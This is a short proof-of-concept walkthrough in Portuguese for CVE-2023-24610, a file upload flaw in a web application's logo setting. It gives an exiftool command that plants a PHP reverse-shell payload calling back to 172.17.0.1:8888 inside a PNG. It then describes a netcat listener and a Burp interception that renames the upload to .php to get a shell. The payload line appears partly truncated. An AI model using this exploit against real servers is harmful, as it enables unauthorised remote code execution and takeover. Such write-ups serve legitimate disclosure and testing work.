
Isto é uma prova de conceito para CVE-2023-24610
Este é um proof of concept para CVE-2023-24610
Começamos criando um arquivo poliglota usando o exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

Alteramos o arquivo para png para que ele passe na verificação do front-end

Depois disso, iniciamos um listener nc na porta 8888 para receber a shell.

O próximo passo é fazer login na aplicação e clicar em setup

Na parte inferior da página, vemos uma área de logo da prática. Podemos fazer upload de um arquivo usando o botão de editar no lado direito

Clicamos em editar e depois em procurar, selecionamos o arquivo ".png" que criamos no primeiro passo

Antes de clicar em upload, nos certificamos de interceptar a requisição com o burp ou algo similar. Clicamos em upload e, no burp, alteramos a extensão do arquivo de "png" para "php"

Desligamos a interceptação para que nosso arquivo seja enviado e verificamos o listener nc que iniciamos anteriormente. Temos uma reverse shell e o IP aponta para nosso container docker.
